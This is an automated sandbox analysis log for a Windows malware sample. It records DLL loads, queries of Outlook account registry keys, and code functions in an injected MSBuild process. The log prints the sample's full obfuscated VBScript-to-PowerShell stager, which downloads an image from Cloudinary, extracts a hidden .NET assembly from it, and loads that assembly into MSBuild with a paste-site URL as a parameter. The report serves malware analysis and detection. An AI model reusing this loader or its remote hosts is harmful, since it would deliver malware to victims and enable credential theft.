                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: winmm.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: urlmon.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wininet.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: iertutil.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: iphlpapi.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mswsock.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dnsapi.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rasadhlp.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: fwpuclnt.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: winhttp.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: winnsi.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: version.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wininet.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: pstorec.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: vaultcli.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dpapi.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: msasn1.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: pstorec.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: msasn1.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: msasn1.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: msasn1.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{06290BD0-48AA-11D2-8432-006008C3FBFC}\InprocServer32Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\AccountsJump to behavior

                          Data Obfuscation

                          barindex
                          Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: WScript.CreateObject("WScript.Shell") Dim impellir impellir = "??????????????????????????" enlutar = "??????????????????????????po??????????????????????????we??????????????????????????rs??????????????????????????hel??????????????????????????l.e??????????????????????????xe?????????????????????????? $??????????????????????????maremma ??????????????????????????= ??????????????????????????'aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07JG5lbmhvID0gJ2h0dHBzOi8vcmVzLmNsb3VkaW5hcnkuY29tL2R5dGZsdDYxbi9pbWFnZS91cGxvYWQvdjE3MzMxMzQ5NDcvYmtscHlzZXlldXQ0aW1wdzUwbjEuanBnICc7JGFsdm9yb3RhciA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7JGNob3N0cmEgPSAkYWx2b3JvdGFyLkRvd25sb2FkRGF0YSgkbmVuaG8pOyRwZXJpZ29zYW1lbnRlID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoJGNob3N0cmEpOyRtZXhlcm90byA9ICc8PEJBU0U2NF9TVEFSVD4+JzskbHVwYW50ZSA9ICc8PEJBU0U2NF9FTkQ+Pic7JGVuY2FyZGlyID0gJHBlcmlnb3NhbWVudGUuSW5kZXhPZigkbWV4ZXJvdG8pOyRuaXN0byA9ICRwZXJpZ29zYW1lbnRlLkluZGV4T2YoJGx1cGFudGUpOyRlbmNhcmRpciAtZ2UgMCAtYW5kICRuaXN0byAtZ3QgJGVuY2FyZGlyOyRlbmNhcmRpciArPSAkbWV4ZXJvdG8uTGVuZ3RoOyRjdW5ldGEgPSAkbmlzdG8gLSAkZW5jYXJkaXI7JGF1bGljaXNtbyA9ICRwZXJpZ29zYW1lbnRlLlN1YnN0cmluZygkZW5jYXJkaXIsICRjdW5ldGEpOyRkZWJpbGl0YW1lbnRvID0gLWpvaW4gKCRhdWxpY2lzbW8uVG9DaGFyQXJyYXkoKSB8IEZvckVhY2gtT2JqZWN0IHsgJF8gfSlbLTEuLi0oJGF1bGljaXNtby5MZW5ndGgpXTskZWxlbWllaXJhID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkZGViaWxpdGFtZW50byk7JGxldmFkb3VyYSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoJGVsZW1pZWlyYSk7JGVzY290YSA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRlc2NvdGEuSW52b2tlKCRudWxsLCBAKCcwL2ZoY3dvL3IvZWUuZXRzYXAvLzpzcHR0aCcsICdiaWNoYW5jcm9zJywgJ2JpY2hhbmNyb3MnLCAnYmljaGFuY3JvcycsICdNU0J1aWxkJywgJ2JpY2hhbmNyb3MnLCAnYmljaGFuY3JvcycsJ2JpY2hhbmNyb3MnLCdiaWNoYW5jcm9zJywnYmljaGFuY3JvcycsJ2JpY2hhbmNyb3MnLCdiaWNoYW5jcm9zJywnMScsJ2JpY2hhbmNyb3MnKSk7aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07'??????????????????????????;??????????????????????????$??????????????????????????escumar?????????????????????????? = ??????????????????????????[S??????????????????????????yst??????????????????????????em??????????????????????????.Tex??????????????????????????t.E??????????????????????????nc??????????????????????????odi????????????
                          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $maremma = 'aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07JG5lbmhvID0gJ2h0dHBzOi8vcmVzLmNsb3VkaW5hcnkuY29tL2R5dGZsdDYxbi9pbWFnZS91cGxvYWQvdjE3MzMxMzQ5NDcvYmtscHlzZXlldXQ0aW1wdzUwbjEuanBnICc7JGFsdm9yb3RhciA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7JGNob3N0cmEgPSAkYWx2b3JvdGFyLkRvd25sb2FkRGF0YSgkbmVuaG8pOyRwZXJpZ29zYW1lbnRlID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoJGNob3N0cmEpOyRtZXhlcm90byA9ICc8PEJBU0U2NF9TVEFSVD4+JzskbHVwYW50ZSA9ICc8PEJBU0U2NF9FTkQ+Pic7JGVuY2FyZGlyID0gJHBlcmlnb3NhbWVudGUuSW5kZXhPZigkbWV4ZXJvdG8pOyRuaXN0byA9ICRwZXJpZ29zYW1lbnRlLkluZGV4T2YoJGx1cGFudGUpOyRlbmNhcmRpciAtZ2UgMCAtYW5kICRuaXN0byAtZ3QgJGVuY2FyZGlyOyRlbmNhcmRpciArPSAkbWV4ZXJvdG8uTGVuZ3RoOyRjdW5ldGEgPSAkbmlzdG8gLSAkZW5jYXJkaXI7JGF1bGljaXNtbyA9ICRwZXJpZ29zYW1lbnRlLlN1YnN0cmluZygkZW5jYXJkaXIsICRjdW5ldGEpOyRkZWJpbGl0YW1lbnRvID0gLWpvaW4gKCRhdWxpY2lzbW8uVG9DaGFyQXJyYXkoKSB8IEZvckVhY2gtT2JqZWN0IHsgJF8gfSlbLTEuLi0oJGF1bGljaXNtby5MZW5ndGgpXTskZWxlbWllaXJhID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkZGViaWxpdGFtZW50byk7JGxldmFkb3VyYSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoJGVsZW1pZWlyYSk7JGVzY290YSA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRlc2NvdGEuSW52b2tlKCRudWxsLCBAKCcwL2ZoY3dvL3IvZWUuZXRzYXAvLzpzcHR0aCcsICdiaWNoYW5jcm9zJywgJ2JpY2hhbmNyb3MnLCAnYmljaGFuY3JvcycsICdNU0J1aWxkJywgJ2JpY2hhbmNyb3MnLCAnYmljaGFuY3JvcycsJ2JpY2hhbmNyb3MnLCdiaWNoYW5jcm9zJywnYmljaGFuY3JvcycsJ2JpY2hhbmNyb3MnLCdiaWNoYW5jcm9zJywnMScsJ2JpY2hhbmNyb3MnKSk7aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07';$escumar = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($maremma));Invoke-Expression $escumar
                          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $maremma = 'aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07JG5lbmhvID0gJ2h0dHBzOi8vcmVzLmNsb3VkaW5hcnkuY29tL2R5dGZsdDYxbi9pbWFnZS91cGxvYWQvdjE3MzMxMzQ5NDcvYmtscHlzZXlldXQ0aW1wdzUwbjEuanBnICc7JGFsdm9yb3RhciA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7JGNob3N0cmEgPSAkYWx2b3JvdGFyLkRvd25sb2FkRGF0YSgkbmVuaG8pOyRwZXJpZ29zYW1lbnRlID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoJGNob3N0cmEpOyRtZXhlcm90byA9ICc8PEJBU0U2NF9TVEFSVD4+JzskbHVwYW50ZSA9ICc8PEJBU0U2NF9FTkQ+Pic7JGVuY2FyZGlyID0gJHBlcmlnb3NhbWVudGUuSW5kZXhPZigkbWV4ZXJvdG8pOyRuaXN0byA9ICRwZXJpZ29zYW1lbnRlLkluZGV4T2YoJGx1cGFudGUpOyRlbmNhcmRpciAtZ2UgMCAtYW5kICRuaXN0byAtZ3QgJGVuY2FyZGlyOyRlbmNhcmRpciArPSAkbWV4ZXJvdG8uTGVuZ3RoOyRjdW5ldGEgPSAkbmlzdG8gLSAkZW5jYXJkaXI7JGF1bGljaXNtbyA9ICRwZXJpZ29zYW1lbnRlLlN1YnN0cmluZygkZW5jYXJkaXIsICRjdW5ldGEpOyRkZWJpbGl0YW1lbnRvID0gLWpvaW4gKCRhdWxpY2lzbW8uVG9DaGFyQXJyYXkoKSB8IEZvckVhY2gtT2JqZWN0IHsgJF8gfSlbLTEuLi0oJGF1bGljaXNtby5MZW5ndGgpXTskZWxlbWllaXJhID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkZGViaWxpdGFtZW50byk7JGxldmFkb3VyYSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoJGVsZW1pZWlyYSk7JGVzY290YSA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRlc2NvdGEuSW52b2tlKCRudWxsLCBAKCcwL2ZoY3dvL3IvZWUuZXRzYXAvLzpzcHR0aCcsICdiaWNoYW5jcm9zJywgJ2JpY2hhbmNyb3MnLCAnYmljaGFuY3JvcycsICdNU0J1aWxkJywgJ2JpY2hhbmNyb3MnLCAnYmljaGFuY3JvcycsJ2JpY2hhbmNyb3MnLCdiaWNoYW5jcm9zJywnYmljaGFuY3JvcycsJ2JpY2hhbmNyb3MnLCdiaWNoYW5jcm9zJywnMScsJ2JpY2hhbmNyb3MnKSk7aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07';$escumar = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($maremma));Invoke-Expression $escumarJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_0041BCE3 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,7_2_0041BCE3
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_004567E0 push eax; ret 7_2_004567FE
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_0045B9DD push esi; ret 7_2_0045B9E6
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_00455EAF push ecx; ret 7_2_00455EC2
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_00433FF6 push ecx; ret 7_2_00434009
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_10002806 push ecx; ret 7_2_10002819
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_10009FD8 push esi; ret 7_2_10009FD9
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_0044693D push ecx; ret 8_2_0044694D
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_0044DB70 push eax; ret 8_2_0044DB84
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_0044DB70 push eax; ret 8_2_0044DBAC
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_00451D54 push eax; ret 8_2_00451D61
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0044B090 push eax; ret 9_2_0044B0A4
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0044B090 push eax; ret 9_2_0044B0CC
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_00444E71 push ecx; ret 9_2_00444E81
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 11_2_00414060 push eax; ret 11_2_00414074
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 11_2_00414060 push eax; ret 11_2_0041409C
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 11_2_00414039 push ecx; ret 11_2_00414049
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 11_2_004164EB push 0000006Ah; retf 11_2_004165C4
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 11_2_00416553 push 0000006Ah; retf 11_2_004165C4
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 11_2_00416555 push 0000006Ah; retf 11_2_004165C4
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_00406128 ShellExecuteW,URLDownloadToFileW,7_2_00406128
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_00419BC4 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,7_2_00419BC4
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_0041BCE3 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,7_2_0041BCE3
                          Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
